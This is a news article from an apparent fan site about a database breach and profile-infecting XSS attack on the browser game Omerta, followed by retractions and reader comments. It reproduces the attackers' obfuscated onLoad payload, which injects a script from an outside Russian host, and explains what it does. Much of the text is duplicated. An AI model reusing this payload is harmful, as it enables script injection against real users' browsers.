» Menu
» OB/Site News
» Articles
» Barafranca News
 |
|
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.
Barafranca News: Connection problems - fixed
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Barafranca News: Connection problems - fixed
By Brando: There was a hardware problem which was solved by switching that machine off.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)
Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
blackberry (20:16:58 - 22-09)
so who was behind the hack? it happened right in the middle of a war so i wonder
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
Anonymous (19:58:57 - 22-09)
or maybe jsut a nomerta ? this is fucking ridiculas how does a company whom is now making so much money get hacked ? by what seems simple hacking methods for those who know
seems odd :r why not upgrade your shit omerta lol
seems odd :r why not upgrade your shit omerta lol
Anonymous (19:56:38 - 22-09)
:) Wow, with this kind of actions from the crew i expect a Omerta.china or Omerta.NorthKorea pretty soon!